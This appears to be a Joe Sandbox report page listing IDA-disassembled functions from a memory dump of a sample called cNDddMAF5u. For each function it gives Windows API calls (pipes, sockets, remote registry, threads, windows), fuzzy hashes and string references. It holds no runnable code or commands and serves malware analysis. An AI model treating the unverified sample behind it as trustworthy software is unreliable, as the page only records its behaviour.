Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: fddf2355c5058bce4486b9952db17387d516fa23ac733b0d0dfb1c519947d7f3
Instruction ID: 5f04e9a20080c1ec9dcfeb4dbcf02e13dc6bc6cf77c1bdd166513f94d98461c3
Opcode Fuzzy Hash: fddf2355c5058bce4486b9952db17387d516fa23ac733b0d0dfb1c519947d7f3
Instruction Fuzzy Hash: BD217C71500305ABDB209F2DD848E9A7BA5BF44724F204A19F8A1E62E0D7B499E0CFA0

Function 007105A7 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 007105C6
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00710601

Strings

nul, xrefs: 00710639

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CreateHandlePipe
String ID: nul
API String ID: 1424370930-2873401336
Opcode ID: dfbfad0468ffc6e8bcc520c3e816463e8ae478d258f1554e5d9c7b105aa299ae
Instruction ID: cdc5b89cfc07720f88b4c32979d691bceb091cd3394304172d78b494e3893902
Opcode Fuzzy Hash: dfbfad0468ffc6e8bcc520c3e816463e8ae478d258f1554e5d9c7b105aa299ae
Instruction Fuzzy Hash: 692181755003059BDB209F6D8C08ADAB7E4BF95720F204A19F8A1E72E0D7F498E0CBA4

Function 007340AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 006A600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006A604C
Part of subcall function 006A600E: GetStockObject.GDI32(00000011), ref: 006A6060
Part of subcall function 006A600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 006A606A

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00734112
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0073411F
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0073412A
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00734139
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00734145

Strings

Msctls_Progress32, xrefs: 007340E3

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 3b67930b96aad6c048eced31f2c3a8eb16204ed3e19d8b3fcf056ee4ae68246a
Instruction ID: e5897f150d34c940104e9483c438d16bfd265cfff8e7a658432f03a8aa321854
Opcode Fuzzy Hash: 3b67930b96aad6c048eced31f2c3a8eb16204ed3e19d8b3fcf056ee4ae68246a
Instruction Fuzzy Hash: A811B2B214021DBEFF119F64CC86EE77F9DEF09798F014111FA18A2050CA769C61DBA4

Function 006DD7DF Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006DD7A3: _free.LIBCMT ref: 006DD7CC

_free.LIBCMT ref: 006DD82D

Part of subcall function 006D29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000), ref: 006D29DE
Part of subcall function 006D29C8: GetLastError.KERNEL32(00000000,?,006DD7D1,00000000,00000000,00000000,00000000,?,006DD7F8,00000000,00000007,00000000,?,006DDBF5,00000000,00000000), ref: 006D29F0

_free.LIBCMT ref: 006DD838
_free.LIBCMT ref: 006DD843
_free.LIBCMT ref: 006DD897
_free.LIBCMT ref: 006DD8A2
_free.LIBCMT ref: 006DD8AD
_free.LIBCMT ref: 006DD8B8

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction ID: ae1737402aa4f2e1c42d28d22f158373e10cff8cb4e5ac7750636e3560ccc2c7
Opcode Fuzzy Hash: d5e9bbcb1dbdafe4c8d3bd98f36014f41f46dc5d4a3df644b036f3c2391e0fc8
Instruction Fuzzy Hash: 2F115171D40B04AAD5A1BFB1CC57FCB7BDE6F10700F40082EB29DAA292DA65F5055654

Function 0070DA5A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0070DA74
LoadStringW.USER32(00000000), ref: 0070DA7B
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0070DA91
LoadStringW.USER32(00000000), ref: 0070DA98
MessageBoxW.USER32(00000000,?,?,00011010), ref: 0070DADC

Strings

%s (%d) : ==> %s: %s %s, xrefs: 0070DAB9

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: HandleLoadModuleString$Message
String ID: %s (%d) : ==> %s: %s %s
API String ID: 4072794657-3128320259
Opcode ID: 906dca424b36607cd39f02499c6253d79990df22a7b7ab38104c5c07f05be353
Instruction ID: 32f1d5f5e915cb5b907f9210c162172224690028935f5a7afc2b83e10af9664a
Opcode Fuzzy Hash: 906dca424b36607cd39f02499c6253d79990df22a7b7ab38104c5c07f05be353
Instruction Fuzzy Hash: 2E0186F2500208BFF7119BE09D89EE7376CE708702F408595B706F2081EA789E844F79

Function 0071096B Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0164F2B0,0164F2B0), ref: 0071097B
EnterCriticalSection.KERNEL32(0164F290,00000000), ref: 0071098D
TerminateThread.KERNEL32(72446D65,000001F6), ref: 0071099B
WaitForSingleObject.KERNEL32(72446D65,000003E8), ref: 007109A9
CloseHandle.KERNEL32(72446D65), ref: 007109B8
InterlockedExchange.KERNEL32(0164F2B0,000001F6), ref: 007109C8
LeaveCriticalSection.KERNEL32(0164F290), ref: 007109CF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: e58bf839b264876abd9a234e37eb554efc8647ae7c98f27b9b397cde9b71ec3f
Instruction ID: 8c6b6f0de25a4443ce0867c9e17626147ee2b0c1d3b87b96bc7c6fec7de5cc56
Opcode Fuzzy Hash: e58bf839b264876abd9a234e37eb554efc8647ae7c98f27b9b397cde9b71ec3f
Instruction Fuzzy Hash: D2F0E131442512BBE7525F94EE8DBD67B35FF05703F405015F101608A1C7B9A4B5CF94

Function 00721C60 Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON

Download Yara Rule

APIs

__WSAFDIsSet.WSOCK32(00000000,?), ref: 00721DC0
#17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00721DE1
WSAGetLastError.WSOCK32 ref: 00721DF2
htons.WSOCK32(?), ref: 00721EDB
inet_ntoa.WSOCK32(?), ref: 00721E8C

Part of subcall function 007039E8: _strlen.LIBCMT ref: 007039F2

Part of subcall function 00723224: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0071EC0C), ref: 00723240

_strlen.LIBCMT ref: 00721F35

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
String ID:
API String ID: 3203458085-0
Opcode ID: 75c1959eba9a9d5b243fa41e395a01fb132f5e0262f26f72da169ba1f0bf2952
Instruction ID: f0847b8f905e44355049ebc4cccfeeeec4cd0dff6fdc49f977982c83b97d0294
Opcode Fuzzy Hash: 75c1959eba9a9d5b243fa41e395a01fb132f5e0262f26f72da169ba1f0bf2952
Instruction Fuzzy Hash: 82B11370604310AFD324EF24D895E2A7BE6BF95318F94894CF4565B2E2CB35EE42CB91

Function 006D01B7 Relevance: 9.3, APIs: 6, Instructions: 269COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 006D00BA
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D00D6
__allrem.LIBCMT ref: 006D00ED
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D010B
__allrem.LIBCMT ref: 006D0122
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006D0140

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
String ID:
API String ID: 1992179935-0
Opcode ID: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction ID: 789a52e1028e7f1ce8ce85cde3e47e64e10823ee33a71b96b7d7798503dec9e1
Opcode Fuzzy Hash: 8fbb49ba762f8ece8e29681380aa111ddf72d6c7443a1a5a7b6c612577c50f6c
Instruction Fuzzy Hash: 0481C072E00706ABE720AF69CC41BAA73EBEF41364F25452FF561DA381E770D9018B94

Function 006D61FE Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,006C82D9,006C82D9,?,?,?,006D644F,00000001,00000001,8BE85006), ref: 006D6258
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,006D644F,00000001,00000001,8BE85006,?,?,?), ref: 006D62DE
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,8BE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 006D63D8
__freea.LIBCMT ref: 006D63E5

Part of subcall function 006D3820: RtlAllocateHeap.NTDLL(00000000,?,00771444,?,006BFDF5,?,?,006AA976,00000010,00771440,006A13FC,?,006A13C6,?,006A1129), ref: 006D3852

__freea.LIBCMT ref: 006D63EE
__freea.LIBCMT ref: 006D6413

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: 1fe672017f0bda59fc074049c300804b3ab928fbc8a9a43dadb8d586c9973ed2
Instruction ID: 52ee46a50e8334df4862fd95ac41680d42a5a37cb441d13014d47e8fe0f600f4
Opcode Fuzzy Hash: 1fe672017f0bda59fc074049c300804b3ab928fbc8a9a43dadb8d586c9973ed2
Instruction Fuzzy Hash: 3051D072E00216ABEB268F64DC81EEF77ABEB44710F16462AFC05D6341EB34DD45D6A0

Function 0072BBDB Relevance: 9.2, APIs: 6, Instructions: 191registryCOMMON

Download Yara Rule

APIs

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

Part of subcall function 0072C998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0072B6AE,?,?), ref: 0072C9B5
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072C9F1
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA68
Part of subcall function 0072C998: _wcslen.LIBCMT ref: 0072CA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0072BCCA
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0072BD25
RegCloseKey.ADVAPI32(00000000), ref: 0072BD6A
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0072BD99
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0072BDF3
RegCloseKey.ADVAPI32(?), ref: 0072BDFF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 1120388591-0
Opcode ID: ee43b1c7ad5c7f420bf030aa57fbf1200fb3243346630de161d76e9360df9b8c
Instruction ID: ed8eea9986c740c8ae9d95de936788bb45a6bc4a84a548048df9f209b004d93a
Opcode Fuzzy Hash: ee43b1c7ad5c7f420bf030aa57fbf1200fb3243346630de161d76e9360df9b8c
Instruction Fuzzy Hash: AF81BE70208241EFD714EF24C885E6ABBE5FF85308F14895CF5598B2A2DB35ED45CB92

Function 006FF7AD Relevance: 9.2, APIs: 6, Instructions: 183memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(00000035), ref: 006FF7B9
SysAllocString.OLEAUT32(00000001), ref: 006FF860
VariantCopy.OLEAUT32(006FFA64,00000000), ref: 006FF889
VariantClear.OLEAUT32(006FFA64), ref: 006FF8AD
VariantCopy.OLEAUT32(006FFA64,00000000), ref: 006FF8B1
VariantClear.OLEAUT32(?), ref: 006FF8BB

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Variant$ClearCopy$AllocInitString
String ID:
API String ID: 3859894641-0
Opcode ID: 2b2c7be50fc61254365670e57ef8b5db7fa241b57dad4b4ff855e5826eed078f
Instruction ID: d7c64717ca9e711501c74fa2ddc60f75761eba35b8a0e113c3b581251bdc3910
Opcode Fuzzy Hash: 2b2c7be50fc61254365670e57ef8b5db7fa241b57dad4b4ff855e5826eed078f
Instruction Fuzzy Hash: 0951F831900318BADF50AB65D895B79B3E6EF45310F24946AEA05DF292DBB08C40DB5A

Function 0071910C Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 383COMMON

Download Yara Rule

APIs

Part of subcall function 006A7620: _wcslen.LIBCMT ref: 006A7625

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

GetOpenFileNameW.COMDLG32(00000058), ref: 007194E5
_wcslen.LIBCMT ref: 00719506
_wcslen.LIBCMT ref: 0071952D
GetSaveFileNameW.COMDLG32(00000058), ref: 00719585

Strings

X, xrefs: 00719412

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: _wcslen$FileName$OpenSave
String ID: X
API String ID: 83654149-3081909835
Opcode ID: 3cc67134caea43713cd87e95fdede6a5a3bd287d75d6c6b01acb43707c9a9152
Instruction ID: 2e02a88b6813bc8c88317358e3e81313078fec609979288877b9987abfe9c298
Opcode Fuzzy Hash: 3cc67134caea43713cd87e95fdede6a5a3bd287d75d6c6b01acb43707c9a9152
Instruction Fuzzy Hash: 44E1D3315083508FC754EF28C891AAAB7E2FF85310F04896DF9899B2A2DB34DD45CF96

Function 006B920C Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 006B9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 006B9BB2

BeginPaint.USER32(?,?,?), ref: 006B9241
GetWindowRect.USER32(?,?), ref: 006B92A5
ScreenToClient.USER32(?,?), ref: 006B92C2
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 006B92D3
EndPaint.USER32(?,?,?,?,?), ref: 006B9321
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 006F71EA

Part of subcall function 006B9339: BeginPath.GDI32(00000000), ref: 006B9357

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
String ID:
API String ID: 3050599898-0
Opcode ID: c501c6ed83dd6a9fad047e68fecc3fdbccfbc98245513abb4e077f358239d57b
Instruction ID: 3c6e25b24d591463cdaf6206e5965cbe718b3010e48983869e98a454fd3ed942
Opcode Fuzzy Hash: c501c6ed83dd6a9fad047e68fecc3fdbccfbc98245513abb4e077f358239d57b
Instruction Fuzzy Hash: 7E41C1B1104200AFE721DF28CC85FFA7BEAEB45365F144229FB54872A1C735A886DB65

Function 007107EF Relevance: 9.1, APIs: 6, Instructions: 107fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 0071080C
ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00710847
EnterCriticalSection.KERNEL32(?), ref: 00710863
LeaveCriticalSection.KERNEL32(?), ref: 007108DC
ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 007108F3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00710921

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: 2ecd78a34407a79c472df6e7d685d76f69b37956f33900eda6ca743671d69f43
Instruction ID: 0a8c6d9686b3b9422ae59fcbca002a3fefadf65a7765d12b45b9dc9547e0eca7
Opcode Fuzzy Hash: 2ecd78a34407a79c472df6e7d685d76f69b37956f33900eda6ca743671d69f43
Instruction Fuzzy Hash: F6418F71900205EFEF159F64DC85AAA7779FF04310F1480A9ED00AA297DB74DEA1DBA8

Function 007381DB Relevance: 9.1, APIs: 6, Instructions: 104windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,006FF3AB,00000000,?,?,00000000,?,006F682C,00000004,00000000,00000000), ref: 0073824C
EnableWindow.USER32(00000000,00000000), ref: 00738272
ShowWindow.USER32(FFFFFFFF,00000000), ref: 007382D1
ShowWindow.USER32(00000000,00000004), ref: 007382E5
EnableWindow.USER32(00000000,00000001), ref: 0073830B
SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 0073832F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: b9fa229399d35af0fe82b54af20d07901401f384d477d1d683704f66a7255ec2
Instruction ID: 5b01173f9f9967c7808c4eb6c40fedb8ad9e81251fbe962e16c84ef4c7a8cbb0
Opcode Fuzzy Hash: b9fa229399d35af0fe82b54af20d07901401f384d477d1d683704f66a7255ec2
Instruction Fuzzy Hash: 89418334601744EFEB51CF15C899BA97BE0FB0A715F1881A9FA085B263CB39A841CF56

Function 00704C7D Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00704C95
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00704CB2
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00704CEA
_wcslen.LIBCMT ref: 00704D08
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00704D10
_wcsstr.LIBVCRUNTIME ref: 00704D1A

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
String ID:
API String ID: 72514467-0
Opcode ID: e01d13c19f0f1f542da394d5afbd9a385244e763c547042b6bc7543f65c5b109
Instruction ID: 521dbc064bc53a50380c7fa3bd8637cbedfb95b810c1ed48a1c957ec6566653b
Opcode Fuzzy Hash: e01d13c19f0f1f542da394d5afbd9a385244e763c547042b6bc7543f65c5b109
Instruction Fuzzy Hash: 4A2107B2204210FBFB155B35DC0AE7B7BDDDF45750F10816DFA05DA1A1DA69CC4187A0

Function 0071581E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 336comCOMMON

Download Yara Rule

APIs

Part of subcall function 006A3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,006A3A97,?,?,006A2E7F,?,?,?,00000000), ref: 006A3AC2

_wcslen.LIBCMT ref: 0071587B
CoInitialize.OLE32(00000000), ref: 00715995
